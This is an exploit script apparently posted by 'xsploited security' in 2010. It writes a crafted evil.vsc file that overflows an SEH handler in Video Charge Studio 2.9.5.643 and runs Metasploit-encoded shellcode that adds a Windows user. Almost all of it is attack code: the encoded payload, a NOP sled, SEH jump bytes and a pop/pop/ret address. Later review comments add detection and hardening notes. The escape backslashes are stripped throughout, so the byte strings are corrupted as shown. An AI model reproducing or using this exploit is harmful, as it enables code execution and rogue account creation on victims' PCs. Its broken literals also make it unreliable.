
# Title : Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Published : 2010-12-06
# Author : xsploited security


#!/usr/bin/python
# Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: <= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A

### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.

### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc file's
# "Filename" value field.
# An attacker could trick a user into loading a specially crafted vsc file to execute
# arbitrary code on the user's PC without their consent.

### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!

# "When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer."					-Harry Browne

import struct
import sys

# Banner printed on start-up. NOTE(review): in this copy every escape sequence
# has lost its backslash ("n" where a newline was evidently meant, "x90" where a
# byte was meant), so the literals below contain the plain letters as written;
# the comments describe what the author's own notes say each piece is meant
# to be. `print about` here and the "[*] Payload size" line below use Python 2
# statement syntax, so this script does not run under Python 3. `sys` is
# imported above but never used in this script.
about = "=================================================n"
about +=  " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)n"
about +=  " Author: xsploited securityn URL: http://www.x-sploited.com/n"
about +=  " Contact: xsploitedsecurity [at] gmail.comn"
about +=  "=================================================n"
print about

# msfpayload windows/adduser user=xsploited pass=sec  EXITFUNC=seh
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b 'x00x09x0a
# x0dx3ex3cx26x20x21x22x23x2ax07' > /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)

# Encoded payload emitted by the msfpayload/msfencode command quoted above
# (windows/adduser, 302 bytes per that output). Defensive note: the visible
# effect of a successful run is a new local user account, so a user-creation
# event (4720 on modern Windows) shortly after a media application opened a
# .vsc file is the artefact to alert on.
shellcode = (
"x6ax46x59xd9xeexd9x74x24xf4x5bx81x73x13xce"
"xcfxb0x91x83xebxfcxe2xf4x32x27x39x91xcexcf"
"xd0x18x2bxfex62xf5x45x9dx80x1ax9cxc3x3bxc3"
"xdax44xc2xb9xc1x78xfaxb7xffx30x81x51x62xf3"
"xd1xedxccxe3x90x50x01xc2xb1x56x2cx3fxe2xc6"
"x45x9dxa0x1ax8cxf3xb1x41x45x8fxc8x14x0exbb"
"xfax90x1ex9fx3bxd9xd6x44xe8xb1xcfx1cx53xad"
"x87x44x84x1axcfx19x81x6exffx0fx1cx50x01xc2"
"xb1x56xf6x2fxc5x65xcdxb2x48xaaxb3xebxc5x73"
"x96x44xe8xb5xcfx1cxd6x1axc2x84x3bxc9xd2xce"
"x63x1axcax44xb1x41x47x8bx94xb5x95x94xd1xc8"
"x94x9ex4fx71x96x90xeax1axdcx24x36xccxa4xce"
"x3dx14x77xcfxb0x91x9exa7x81x1axa1x48x4fx44"
"x75x31xbexa3x24xa7x16x04x73x52x4fx44xf2xc9"
"xccx9bx4ex34x50xe4xcbx74xf7x82xbcxa0xdax91"
"x9dx30x65xf2xa3xabx9exf4xb6xaax90xbexadxef"
"xdexf4xbaxefxc5xe2xabxbdx90xe9xbdxbfxdcxfe"
"xa7xbbxd5xf5xeexbcxd5xf2xeexe0xf1xd5x8axef"
"x96xb7xeexa1xd5xe5xeexa3xdfxf2xafxa3xd7xe3"
"xa1xbaxc0xb1x8fxabxddxf8xa0xa6xc3xe5xbcxae"
"xc4xfexbcxbcx90xe9xbdxbfxdcxfexa7xbbxd5xf5"
"xeexe0xf1xd5x8axcfxbax91"
);

# Opening part of the .vsc document. The hex decodes to:
#   <?xml version="1.0" encoding="Windows-1252" ?><config ver="2.9.5.643">
#   <cols name="Files"/>  <cols name="Profiles">  <Property name="Profile">
#   <cols name="Formats">  <Property name="Format">
#   <Value name="Name" type="8" value="
# (elements separated by CRLF). The oversized payload is appended right after
# the opening quote of that last `value` attribute. NOTE(review): the advisory
# text above speaks of a "Filename" field, but what this header literally
# targets is `<Value name="Name" ...>`; confirm which element the parser
# actually overflows on before building a signature around the name. A .vsc
# whose `value` attribute runs to hundreds of bytes is anomalous for this
# format and is the cheap thing to flag on.
header = (
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30"
"x22x20x65x6ex63x6fx64x69x6ex67x3dx22x57x69x6ex64x6fx77x73x2d"
"x31x32x35x32x22x20x3fx3ex3cx63x6fx6ex66x69x67x20x76x65x72x3d"
"x22x32x2ex39x2ex35x2ex36x34x33x22x3ex0dx0ax3cx63x6fx6cx73x20"
"x6ex61x6dx65x3dx22x46x69x6cx65x73x22x2fx3ex0dx0ax3cx63x6fx6c"
"x73x20x6ex61x6dx65x3dx22x50x72x6fx66x69x6cx65x73x22x3ex0dx0a"
"x3cx50x72x6fx70x65x72x74x79x20x6ex61x6dx65x3dx22x50x72x6fx66"
"x69x6cx65x22x3ex0dx0ax3cx63x6fx6cx73x20x6ex61x6dx65x3dx22x46"
"x6fx72x6dx61x74x73x22x3ex0dx0ax3cx50x72x6fx70x65x72x74x79x20"
"x6ex61x6dx65x3dx22x46x6fx72x6dx61x74x22x3ex0dx0ax3cx56x61x6c"
"x75x65x20x6ex61x6dx65x3dx22x4ex61x6dx65x22x20x74x79x70x65x3d"
"x22x38x22x20x76x61x6cx75x65x3dx22"
);

# Closing part of the document: "/>  </Property>  </cols>  </Property>
# </cols>  </config> (CRLF-separated), closing every element the header
# opened so the file still looks like an ordinary .vsc to a casual check.
footer = (
"x22x2fx3ex0dx0ax3cx2fx50x72x6fx70x65x72x74x79x3ex0dx0a"
"x3cx2fx63x6fx6cx73x3ex0dx0ax3cx2fx50x72x6fx70x65x72x74x79x3ex0d"
"x0ax3cx2fx63x6fx6cx73x3ex0dx0ax3cx2fx63x6fx6ex66x69x67x3e"
);

# Number of bytes (sled + shellcode) placed before the SEH record is reached,
# per the author's note on the line.
size = 824; #824 junk bytes triggers the bof

# Filler sled sized so that sled + shellcode == size. If the shellcode were
# ever longer than `size`, repeating a string by a negative count silently
# yields "" in Python -- no error would be raised.
payload = "x90" * (size - len(shellcode));
payload += shellcode

# SEH record overwrite: 4 bytes into nSEH (a short jump per the author's
# note), then the handler address 0x61B8451C packed as a little-endian 32-bit
# value (described as a pop/pop/ret in zlib1.dll), then a near jump back into
# the sled. Mitigation note: overwrites of this kind rely on the handler
# address living in a module without SafeSEH/ASLR and on SEHOP being off; the
# standard hardening on current Windows builds breaks that assumption.
payload += "xEBx06x90x90"; #jmp short
payload += struct.pack("<L",0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
payload += "xe9xe0xfcxffxff"; #jmp back 800 bytes

# Final document: header, oversized value, footer.
xsploit = header + payload  + footer;

print("[*] Creating .vsc file");
print "[*] Payload size = " + str(len(payload)) + " bytes";

# Write the document to evil.vsc in the current working directory. The bare
# `except:` swallows every exception, so the real cause (e.g. a permission
# error) is never shown; catching IOError/OSError and printing the exception
# would keep the failure message useful.
try:
	out_file = open("evil.vsc",'w');
	out_file.write(xsploit);
	out_file.close();
	print("[*] Malicious vsc file created successfully");
	print("[*] Launch Video Charge Studio and load the filen[*] Exiting...rn");
except:
	print "[!] Error creating file";